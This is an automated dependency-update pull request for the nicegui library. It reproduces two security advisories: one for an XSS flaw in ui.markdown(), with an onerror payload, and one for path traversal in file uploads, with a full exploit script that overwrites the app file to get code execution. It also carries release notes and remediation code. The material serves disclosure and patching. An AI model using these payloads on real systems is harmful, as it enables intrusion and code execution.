chore(deps): update dependency nicegui to v3.7.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
nicegui	3.5.0 → 3.7.0

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-25516

Description

The ui.markdown() component uses the markdown2 library to convert markdown content to HTML, which is then rendered via innerHTML. By default, markdown2 allows raw HTML to pass through unchanged. This means that if an application renders user-controlled content through ui.markdown(), an attacker can inject malicious HTML containing JavaScript event handlers.

Unlike other NiceGUI components that render HTML (ui.html(), ui.chat_message(), ui.interactive_image()), the ui.markdown() component does not provide or require a sanitize parameter, leaving applications vulnerable to XSS attacks.

Proof of Concept

from nicegui import ui

# User-controlled input containing malicious payload
user_input = 'Hello! <img src=x onerror="alert(\'XSS\')">'

ui.markdown(user_input)  # XSS executes when page loads

ui.run()

When this page loads, the JavaScript in the onerror handler executes, potentially allowing an attacker to:

• Steal session cookies or authentication tokens
• Perform actions on behalf of the user
• Redirect users to malicious sites
• Modify page content

Impact

Applications that render user-provided content through ui.markdown() are vulnerable to stored or reflected XSS attacks. This is particularly concerning for:

• Chat applications displaying user messages
• CMS or documentation systems with user-editable content
• Any application that displays markdown from untrusted sources

Remediation

A release has been published in version 3.7.0.

For Users (Immediate Workaround)

Until a fix is released, do not pass untrusted content directly to ui.markdown(). Instead, use one of these approaches:

Option 1: Convert and sanitize manually using ui.html()

import markdown2
from html_sanitizer import Sanitizer

sanitizer = Sanitizer()

def safe_markdown(content: str) -> None:
    """Render markdown with HTML sanitization."""
    html = markdown2.markdown(content)
    ui.html(sanitizer.sanitize(html), sanitize=False)

# Usage
safe_markdown(user_input)

Option 2: Escape HTML before markdown conversion (if raw HTML not needed)

import html

# Escape HTML entities - prevents any HTML from being interpreted
ui.markdown(html.escape(user_input))

Proposed Fix

Add a sanitize parameter to ui.markdown() consistent with other HTML-rendering components, and/or add an escape_html parameter.

CVE-2026-25732

Summary

NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns.

Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or explicit sanitization are not affected.

Details

Vulnerable Component: nicegui/elements/upload_files.py (upload_files.py#L79-L82 and upload_files.py#L110-L115)

Affected Methods: SmallFileUpload.save()and LargeFileUpload.save()

async def save(self, path: str | Path) -> None:
    target = Path(path)
    target.parent.mkdir(parents=True, exist_ok=True)
    await run.io_bound(target.write_bytes, self._data)

Root Cause: The save() method performs no validation on the provided path parameter. It accepts:

• Relative paths with ../ sequences
• Absolute paths
• Any file system location writable by the process

When developers use e.file.name (controlled by the attacker) in constructing save paths, directory traversal occurs:

save_path = UPLOAD_DIR / e.file.name  # e.file.name = "../app.py"
await e.file.save(save_path)           # Writes outside UPLOAD_DIR

PoC

• Terminal 1 (App)

cd /tmp && mkdir -p evilgui && cd evilgui
python3 -m venv evilgui && source evilgui/bin/activate
pip install nicegui

cat > vulnerable_app.py << 'EOF'
from nicegui import ui
from pathlib import Path

UPLOAD_DIR = Path('./uploads')
UPLOAD_DIR.mkdir(exist_ok=True)

@&#8203;ui.page('/')
def index():
    async def handle_upload(e):
        save_path = UPLOAD_DIR / e.file.name
        await e.file.save(save_path)
        ui.notify(f'File saved: {e.file.name}')
    
    ui.upload(on_upload=handle_upload, auto_upload=True)

ui.run(port=8080, reload=False)
EOF

python3 vulnerable_app.py &

• Terminal 2 (Exploit)

cat > exploit.py << 'EOF'
import requests, re, time

s = requests.Session()
s.get('http://localhost:8080')
time.sleep(2)

html = s.get('http://localhost:8080').text
match = re.search(r'/_nicegui/client/([^/]+)/upload/(\d+)', html)
upload_url = f'http://localhost:8080/_nicegui/client/{match[1]}/upload/{match[2]}'

payload = '''from nicegui import ui
import subprocess
@&#8203;ui.page("/")
def index():
    ui.label(subprocess.check_output(["id"], text=True))
ui.run(port=8080, reload=False)
'''

s.post(upload_url, files={'file': ('../vulnerable_app.py', payload, 'text/x-python')})
EOF

python3 exploit.py

• Restart the application to execute the injected code:

pkill -f vulnerable_app && python3 vulnerable_app.py

• Observe http://localhost:8080

Impact

Affected Applications: All NiceGUI applications using ui.upload() where developers save files with e.file.save() and include user-controlled filenames (e.g., e.file.name) in the path.

Attack Capabilities:

• Write files to any location writable by the application process
• Overwrite Python application files to achieve remote code execution upon restart
• Overwrite configuration files to alter application behavior
• Write SSH keys, systemd units, or cron jobs for persistent access
• Deny service by corrupting critical files

Exploitability: Trivially exploitable without authentication. Attackers simply upload a file with a malicious filename like ../../../app.py to escape the upload directory. The vulnerability is prevalent in production applications as developers naturally use e.file.name directly, following patterns shown in community examples.

Remediation

For Users

async def handle_upload(e):
    safe_name = Path(e.file.name).name # Strip directory components!
    await e.file.save(UPLOAD_DIR / safe_name)

For Maintainers

async def save(self, path: str | Path, *, base_dir: Path | None = None) -> None:
    target = Path(path).resolve()
    
    if base_dir is not None:
        base_dir = base_dir.resolve()
        if not target.is_relative_to(base_dir):
            raise ValueError(
                f"Path '{target}' escapes base directory '{base_dir}'"
            )
    
    target.parent.mkdir(parents=True, exist_ok=True)
    await run.io_bound(target.write_bytes, self._data)

---

Release Notes

zauberzeug/nicegui (nicegui)

v3.7.0

Compare Source

Security

• ⚠️ Prevent XSS attacks via unsanitized HTML in ui.markdown() (GHSA-v82v-c5x8-w282 by @​falkoschindler, @​evnchn)
• ⚠️ Prevent path traversal via unsanitized FileUpload.name enabling arbitrary file write (GHSA-9ffm-fxg3-xrhh by @​k14uz, @​evnchn, @​falkoschindler)

New features and enhancements

• Introduce UnoCSS support (#​5485 by @​evnchn, @​falkoschindler)
• Unify dark mode API and add color-scheme meta tag for browser/extension compatibility (#​5471, #​5483 by @​davetapley, @​evnchn, @​falkoschindler)
• Set Redis TTL on tab storage keys (#​5594 by @​quantumdark, @​evnchn, @​falkoschindler)
• Perform implicit handshake and fix on_connect called before page is ready (#​5673 by @​evnchn, @​falkoschindler)
• Deprecate custom AG Grid checkboxRenderer in favor of built-in agCheckboxCellRenderer (#​5681, #​5685 by @​CatamountJack, @​CrystalWindSnake, @​falkoschindler, @​evnchn)
• Speed up SVG updates for ui.interactive_image with PIL images (#​5583, #​5653 by @​denniswittich, @​evnchn, @​falkoschindler)

Bugfixes

• Fix vertical stepper animation jitter (#​3881, #​5721 by @​StarDustEins, @​evnchn, @​falkoschindler)
• Fix REPL detection for Python 3.13's new pyrepl (#​5675, #​5710 by @​KrilleGH, @​falkoschindler, @​evnchn)
• Fix shutdown handler not called with native mode and reload enabled (#​2107, #​5702 by @​PawelRoman, @​rodja, @​retsyo, @​frankhuurman, @​krashdifferent, @​python-and-novella, @​Ansari-Codes, @​evnchn, @​falkoschindler)
• Fix app.shutdown for ui.run_with (#​3253, #​5686 by @​MuuXB, @​python-and-novella, @​falkoschindler, @​evnchn, @​falkoschindler)
• Fix video loading issues on Windows in native mode (#​4970, #​5700 by @​MaidScientistIzutsumiMarin, @​python-and-novella, @​evnchn, @​falkoschindler)
• Fix NiceGUIJSONResponse to inherit from JSONResponse so response model schema appears in Swagger (#​5688, #​5689 by @​AleDetto, @​evnchn, @​falkoschindler)
• Avoid ui.expansion stutters during animation (#​4918, #​5659 by @​platinops, @​evnchn, @​falkoschindler)
• Fix protocol not being set when using SSL in native mode (#​4814, #​5655 by @​nachobacanful, @​evnchn, @​falkoschindler)
• Fix input elements not being updated when re-opening a ui.dialog (#​2149, #​5652 by @​adosikas, @​meslahik, @​python-and-novella, @​liunux4odoo, @​evnchn, @​falkoschindler)

Documentation

• Add AG Grid Enterprise demo (#​5676 by @​falkoschindler, @​evnchn)
• Add style principles for exception suppression and optional imports (#​5715 by @​evnchn, @​falkoschindler)

Testing

• Fix test isolation for pages defined in submodules (#​5692, #​5697 by @​kleynjan, @​falkoschindler, @​evnchn)
• Persist tab_id in User fixture (#​5687, #​5690 by @​5553455237, @​evnchn, @​falkoschindler)

Dependencies

• Upgrade minimum Python version to 3.10 and modernize type annotations (#​5696 by @​falkoschindler, @​evnchn)
• Update dependencies to fix security vulnerabilities (#​5695 by @​falkoschindler, @​evnchn)
• Update uv.lock to revision 3 (#​5707 by @​evnchn, @​falkoschindler)

Infrastructure

• Let GPU-free Chrome 144 work in CI (#​5678 by @​evnchn, @​falkoschindler)
• Use contextlib.suppress to ignore exceptions (#​5714 by @​falkoschindler, @​evnchn)

---

Special thanks to our top sponsors Lechler GmbH and TestMu AI ✨

and all our other sponsors and contributors for supporting this project!

🙏 Want to support this project? Check out our GitHub Sponsors page to help us keep building amazing features!

v3.6.1

Compare Source

Bugfix

• Fix hot reload and On Air connection by reverting PR #​5499 (#​5671 by @​python-and-novella, @​falkoschindler)

Testing

• Preserve value when closing a ui.select popup in User simulation (#​4894, #​5670 by @​briemla, @​falkoschindler, @​evnchn, @​rodja)

---

Special thanks to our top sponsors Lechler GmbH and TestMu AI ✨

and all our other sponsors and contributors for supporting this project!

🙏 Want to support this project? Check out our GitHub Sponsors page to help us keep building amazing features!

v3.6.0

Compare Source

New features and enhancements

• Introduce app.colors for global color configuration (#​3787, #​5611 by @​ghbm-itk, @​evnchn, @​falkoschindler)
• Introduce color setters and bindings like set_background_color() and bind_text_color() (#​5511, #​5512 by @​borolepratik, @​evnchn, @​falkoschindler)
• Introduce ui.on_exception for handling exceptions after the page has been sent to the client (#​5617, #​5618 by @​CatamountJack, @​evnchn, @​falkoschindler)
• Provide an easy way to replace AG Grid Community with Enterprise (#​2431, #​5623, #​5629 by @​ducnva, @​luongnv275, @​xaptronic, @​gioxc88, @​evnchn, @​falkoschindler)
• Let ui.altair accept any Altair chart type like LayerChart or FacetChart (#​5649, #​5650 by @​s-meza, @​falkoschindler)
• Allow passing a path to ui.run(show=...) to open a specific page (#​5642 by @​jsb-zz, @​falkoschindler, @​evnchn)
• Make ui.tabs and ui.tab_panels always emit change values as string (#​5637, #​5638 by @​jeffective, @​evnchn, @​falkoschindler)
• Allow the user to click-to-reload when ui.scene loses the WebGL context (#​5360, #​5656 by @​falkoschindler, @​evnchn)
• Suppress Vue component registration warnings for native tags (#​3179, #​5654 by @​jojje, @​ksikka, @​evnchn, @​falkoschindler)
• Patch and warn about late event registrations (#​4154, #​5439, #​5663, #​5664 by @​Alyxion, @​xaptronic, @​evnchn, @​falkoschindler)
• Break up strong reference cycles in slot children for better garbage collection (#​5110, #​5644 by @​thevinchi, @​falkoschindler, @​evnchn, @​phifuh)
• Reduce initial page payload by omitting unused element properties (#​5500 by @​evnchn, @​falkoschindler)
• Speed-up the websocket handshake process (#​5499 by @​evnchn, @​falkoschindler)

Bugfixes

• Fix CSS not being added correctly when calling ui.add_css after client connected (#​5624, #​5628, #​5666, #​5667 by @​svhb1000, @​falkoschindler, @​evnchn)
• Fix ui.dialog being hidden when created inside ui.menu (#​4116, #​5602 by @​tgbl-mk, @​evnchn, @​falkoschindler)
• Fix ui.leaflet tiles not loading when element is unhidden (#​2338, #​5614 by @​kleynjan, @​evnchn, @​falkoschindler)
• Fix ui.log scroll-to-bottom in ui.tab_panel (#​5118, #​5632 by @​pandabearcodes, @​evnchn, @​falkoschindler)
• Fix errors when updating elements on hidden tabs (#​5333, #​5633 by @​natankeddem, @​evnchn, @​falkoschindler)
• Fix AG Grid memory leak on update and unmount (#​5635 by @​evnchn, @​falkoschindler)
• Fix nested updates in ui.anywidget not propagating back to frontend (#​5626, #​5636 by @​s-meza, @​evnchn, @​falkoschindler)
• Ensure API exceptions return raw error instead of NiceGUI error page (#​5508, #​5510 by @​ghbm-itk, @​evnchn, @​falkoschindler)
• Forward log messages through On Air relay (#​5668 by @​falkoschindler)

Documentation

• Add on_path_changed demo and reference for SubPagesRouter (#​5487, #​5665 by @​GinjiJizai, @​falkoschindler, @​evnchn)
• Fix documentation for native mode settings in packaged apps (#​4842, #​5651 by @​h0uter, @​himbeles, @​falkoschindler, @​evnchn)
• Avoid duplication in methods documentation and use best available docstring (#​5630, #​5631 by @​evnchn, @​falkoschindler)
• Fix docs for ui.context.client.connected (#​5607 by @​jeffective, @​falkoschindler, @​evnchn)

Testing

• Add a note about limitations for the asyncio_default_fixture_loop_scope setting (#​4785 by @​gzu300, @​evnchn, @​rodja, @​falkoschindler)

---

Special thanks to our top sponsors Lechler GmbH and TestMu AI ✨

and all our other sponsors and contributors for supporting this project!

🙏 Want to support this project? Check out our GitHub Sponsors page to help us keep building amazing features!

---

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[atlantis-platform-engineering]

Error: This repo is not allowlisted for Atlantis.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud